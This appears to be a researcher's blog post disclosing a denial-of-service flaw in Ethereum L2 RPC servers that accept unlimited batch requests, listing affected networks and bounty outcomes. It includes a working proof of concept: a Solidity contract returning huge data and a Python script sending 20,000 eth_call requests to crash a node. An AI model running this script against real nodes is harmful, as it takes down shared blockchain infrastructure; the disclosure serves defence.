<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>Misconfiguration of Ethereum RPC Series 2: Unlimited Batch Requests | Homepage</title>
    <meta name="generator" content="VuePress 1.9.10">
    <link rel="icon" href="/logo.png">
    <meta name="description" content="Zhiyuan Sun&#39;s personal website">
    
    <link rel="preload" href="/assets/css/0.styles.670d6f26.css" as="style"><link rel="preload" href="/assets/js/app.f6f9624e.js" as="script"><link rel="preload" href="/assets/js/2.9c3d16e9.js" as="script"><link rel="preload" href="/assets/js/1.ae13b9d5.js" as="script"><link rel="preload" href="/assets/js/28.014efb0f.js" as="script"><link rel="prefetch" href="/assets/js/10.348fa4ae.js"><link rel="prefetch" href="/assets/js/11.16c60823.js"><link rel="prefetch" href="/assets/js/12.47b93c21.js"><link rel="prefetch" href="/assets/js/13.8eab7d11.js"><link rel="prefetch" href="/assets/js/14.9b92e4b9.js"><link rel="prefetch" href="/assets/js/15.36c13836.js"><link rel="prefetch" href="/assets/js/16.47e1d84d.js"><link rel="prefetch" href="/assets/js/17.86a696ad.js"><link rel="prefetch" href="/assets/js/18.0498bdb0.js"><link rel="prefetch" href="/assets/js/19.a0bcf0af.js"><link rel="prefetch" href="/assets/js/20.706ac0ca.js"><link rel="prefetch" href="/assets/js/21.ba496146.js"><link rel="prefetch" href="/assets/js/22.fbed27a9.js"><link rel="prefetch" href="/assets/js/23.bff8b7a9.js"><link rel="prefetch" href="/assets/js/24.3ae7893f.js"><link rel="prefetch" href="/assets/js/25.f4a6ddb2.js"><link rel="prefetch" href="/assets/js/26.e2ff6647.js"><link rel="prefetch" href="/assets/js/27.aab4b633.js"><link rel="prefetch" href="/assets/js/29.8b8a1920.js"><link rel="prefetch" href="/assets/js/3.6df97c0a.js"><link rel="prefetch" href="/assets/js/4.ea9d8b6e.js"><link rel="prefetch" href="/assets/js/5.94969ca9.js"><link rel="prefetch" href="/assets/js/6.d433241e.js"><link rel="prefetch" href="/assets/js/7.ab403544.js"><link rel="prefetch" href="/assets/js/vendors~docsearch.b3213737.js">
    <link rel="stylesheet" href="/assets/css/0.styles.670d6f26.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container no-sidebar"><header class="navbar"><div class="sidebar-button"><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" viewBox="0 0 448 512" class="icon"><path fill="currentColor" d="M436 124H12c-6.627 0-12-5.373-12-12V80c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12z"></path></svg></div> <a href="/" class="home-link router-link-active"><!----> <span class="site-name">Homepage</span></a> <div class="links"><!----> <nav class="nav-links can-hide"><div class="nav-item"><a href="/" class="nav-link">
  Home
</a></div><div class="nav-item"><a href="/blog/" class="nav-link router-link-active">
  Blog
</a></div> <!----></nav></div></header> <div class="sidebar-mask"></div> <aside class="sidebar"><nav class="nav-links"><div class="nav-item"><a href="/" class="nav-link">
  Home
</a></div><div class="nav-item"><a href="/blog/" class="nav-link router-link-active">
  Blog
</a></div> <!----></nav>  <!----> </aside> <main class="page"> <div class="theme-default-content content__default"><h1 id="misconfiguration-of-ethereum-rpc-series-2-unlimited-batch-requests">Misconfiguration of Ethereum RPC Series 2: Unlimited Batch Requests</h1> <h2 id="description">Description</h2> <p>A vulnerability exists in the batch request handling of Ethereum-based L2 implementations, where there is no upper limit on the number or size of requests included in a batch. This allows attackers to craft malicious batch requests containing a large volume of memory-intensive operations, resulting in the exhaustion of server resources and potential crashes.</p> <p>The following code snippet illustrates a typical implementation where all responses are stored in memory before being returned to the client. Similar patterns are observed across multiple RPC implementations:</p> <div class="language-go extra-class"><pre class="language-go"><code><span class="token keyword">func</span> <span class="token punctuation">(</span>s <span class="token operator">*</span>Server<span class="token punctuation">)</span> <span class="token function">handleBatchRequest</span><span class="token punctuation">(</span>httpRequest <span class="token operator">*</span>http<span class="token punctuation">.</span>Request<span class="token punctuation">,</span> w http<span class="token punctuation">.</span>ResponseWriter<span class="token punctuation">,</span> data <span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token builtin">byte</span><span class="token punctuation">)</span> <span class="token builtin">int</span> <span class="token punctuation">{</span>
    requests<span class="token punctuation">,</span> err <span class="token operator">:=</span> s<span class="token punctuation">.</span><span class="token function">parseRequests</span><span class="token punctuation">(</span>data<span class="token punctuation">)</span>
    <span class="token keyword">if</span> err <span class="token operator">!=</span> <span class="token boolean">nil</span> <span class="token punctuation">{</span>
        <span class="token function">handleError</span><span class="token punctuation">(</span>w<span class="token punctuation">,</span> err<span class="token punctuation">)</span>
        <span class="token keyword">return</span> <span class="token number">0</span>
    <span class="token punctuation">}</span>

    responses <span class="token operator">:=</span> <span class="token function">make</span><span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token punctuation">]</span>types<span class="token punctuation">.</span>Response<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token function">len</span><span class="token punctuation">(</span>requests<span class="token punctuation">)</span><span class="token punctuation">)</span>

    <span class="token keyword">for</span> <span class="token boolean">_</span><span class="token punctuation">,</span> request <span class="token operator">:=</span> <span class="token keyword">range</span> requests <span class="token punctuation">{</span>
        req <span class="token operator">:=</span> handleRequest<span class="token punctuation">{</span>Request<span class="token punctuation">:</span> request<span class="token punctuation">,</span> HttpRequest<span class="token punctuation">:</span> httpRequest<span class="token punctuation">}</span>
        response <span class="token operator">:=</span> s<span class="token punctuation">.</span>handler<span class="token punctuation">.</span><span class="token function">Handle</span><span class="token punctuation">(</span>req<span class="token punctuation">)</span>
        responses <span class="token operator">=</span> <span class="token function">append</span><span class="token punctuation">(</span>responses<span class="token punctuation">,</span> response<span class="token punctuation">)</span>
    <span class="token punctuation">}</span>

    respBytes<span class="token punctuation">,</span> <span class="token boolean">_</span> <span class="token operator">:=</span> json<span class="token punctuation">.</span><span class="token function">Marshal</span><span class="token punctuation">(</span>responses<span class="token punctuation">)</span>
    <span class="token boolean">_</span><span class="token punctuation">,</span> err <span class="token operator">=</span> w<span class="token punctuation">.</span><span class="token function">Write</span><span class="token punctuation">(</span>respBytes<span class="token punctuation">)</span>
    <span class="token keyword">if</span> err <span class="token operator">!=</span> <span class="token boolean">nil</span> <span class="token punctuation">{</span>
        log<span class="token punctuation">.</span><span class="token function">Error</span><span class="token punctuation">(</span>err<span class="token punctuation">)</span>
        <span class="token keyword">return</span> <span class="token number">0</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">return</span> <span class="token function">len</span><span class="token punctuation">(</span>respBytes<span class="token punctuation">)</span>
<span class="token punctuation">}</span>
</code></pre></div><h2 id="exploitation-steps">Exploitation Steps</h2> <ol><li><strong>Attack Contract Crafting</strong>: An attacker deploys a smart contract that returns extremely large data.</li> <li><strong>Batch Request Construction</strong>: The attacker constructs a batch request to call the smart contract multiple times, and then send the batch request to the RPC client.</li></ol> <h2 id="impact">Impact</h2> <p>A single HTTP packet of relatively small size can exhaust all available memory on a node with significant RAM, leading to a node crash.</p> <h2 id="affected-vendors">Affected Vendors</h2> <ul><li><strong>Metis Mainnet</strong>: Reported in <span style="color:blue;">February 2024</span>, but no response was received.</li> <li><strong>Linea Mainnet</strong>: Reported in <span style="color:blue;">December 2023</span>, but no response was received.</li> <li><strong>Scroll Mainnet</strong>: Reported in <span style="color:blue;">December 2023</span>, and rewarded me 5K USDC bug bounty which equivalent to <span style="color:red;">medium severity</span>.</li> <li><strong>Boba Network Mainnet</strong>: Reported in <span style="color:blue;">July 2023</span>, and acknowledged as a duplicate report.</li> <li><strong>Polygon zkEVM Mainnet</strong>: Reported in <span style="color:blue;">July 2023</span> and confirmed as <span style="color:red;">medium severity</span>.</li></ul> <h2 id="poc">POC</h2> <p>First, deploy the following smart contract on L2 blockchain.</p> <div class="language-solidity extra-class"><pre class="language-solidity"><code><span class="token keyword">pragma</span> <span class="token keyword">solidity</span> <span class="token operator">^</span><span class="token version number">0.8.0</span><span class="token punctuation">;</span>

<span class="token keyword">contract</span> <span class="token class-name">LargeDataReturn</span> <span class="token punctuation">{</span>
    <span class="token keyword">function</span> <span class="token function">getLargeData</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword">public</span> <span class="token keyword">pure</span> <span class="token keyword">returns</span> <span class="token punctuation">(</span><span class="token builtin">bytes</span> <span class="token keyword">memory</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token builtin">uint256</span> length <span class="token operator">=</span> <span class="token number">2</span> <span class="token operator">**</span> <span class="token number">22</span> <span class="token operator">-</span> <span class="token number">2</span> <span class="token operator">*</span> <span class="token number">16</span><span class="token punctuation">;</span>
        <span class="token keyword">assembly</span> <span class="token punctuation">{</span>
            <span class="token keyword">return</span> <span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> length<span class="token punctuation">)</span>
        <span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</code></pre></div><p>Next, replace the smart contract address in the following Python script. The Python script creates a batch request containing 20,000 eth_call. This single batch request can cause the L2 node to crash immediately.</p> <div class="language-python extra-class"><pre class="language-python"><code><span class="token keyword">import</span> requests
<span class="token keyword">import</span> json
<span class="token keyword">from</span> eth_utils <span class="token keyword">import</span> keccak<span class="token punctuation">,</span> to_hex


<span class="token builtin">hash</span> <span class="token operator">=</span> keccak<span class="token punctuation">(</span>text<span class="token operator">=</span><span class="token string">'getLargeData()'</span><span class="token punctuation">)</span>
selector <span class="token operator">=</span> to_hex<span class="token punctuation">(</span><span class="token builtin">hash</span><span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token number">4</span><span class="token punctuation">]</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>selector<span class="token punctuation">)</span>


headers <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token string">'content-type'</span><span class="token punctuation">:</span> <span class="token string">'application/json'</span><span class="token punctuation">}</span>
url <span class="token operator">=</span> <span class="token string">'http://127.0.0.1:8546/'</span>


payload <span class="token operator">=</span> <span class="token punctuation">[</span>
    <span class="token punctuation">{</span>
        <span class="token string">&quot;jsonrpc&quot;</span><span class="token punctuation">:</span> <span class="token string">&quot;2.0&quot;</span><span class="token punctuation">,</span>
        <span class="token string">&quot;method&quot;</span><span class="token punctuation">:</span> <span class="token string">&quot;eth_call&quot;</span><span class="token punctuation">,</span>
        <span class="token string">&quot;params&quot;</span><span class="token punctuation">:</span> <span class="token punctuation">[</span><span class="token punctuation">{</span>
            <span class="token string">&quot;to&quot;</span><span class="token punctuation">:</span> <span class="token string">&quot;0xD296F550529E625209EE5D39d26DA7f32D412f3a&quot;</span><span class="token punctuation">,</span>
            <span class="token string">&quot;data&quot;</span><span class="token punctuation">:</span> selector<span class="token punctuation">,</span>
        <span class="token punctuation">}</span><span class="token punctuation">,</span> <span class="token string">&quot;latest&quot;</span><span class="token punctuation">]</span><span class="token punctuation">,</span>
        <span class="token string">&quot;id&quot;</span><span class="token punctuation">:</span> i
    <span class="token punctuation">}</span>
    <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">20000</span><span class="token punctuation">)</span>
<span class="token punctuation">]</span>
payload <span class="token operator">=</span> json<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;Payload length:&quot;</span><span class="token punctuation">,</span><span class="token builtin">len</span><span class="token punctuation">(</span>payload<span class="token punctuation">)</span> <span class="token operator">/</span> <span class="token punctuation">(</span><span class="token number">1024</span> <span class="token operator">*</span> <span class="token number">1024</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

response <span class="token operator">=</span> requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url<span class="token punctuation">,</span> data<span class="token operator">=</span>payload<span class="token punctuation">,</span> headers<span class="token operator">=</span>headers<span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token builtin">len</span><span class="token punctuation">(</span>response<span class="token punctuation">.</span>content<span class="token punctuation">)</span><span class="token punctuation">)</span>
</code></pre></div></div> <footer class="page-edit"><!----> <!----></footer> <!----> </main></div><div class="global-ui"></div></div>
    <script src="/assets/js/app.f6f9624e.js" defer></script><script src="/assets/js/2.9c3d16e9.js" defer></script><script src="/assets/js/1.ae13b9d5.js" defer></script><script src="/assets/js/28.014efb0f.js" defer></script>
  </body>
</html>
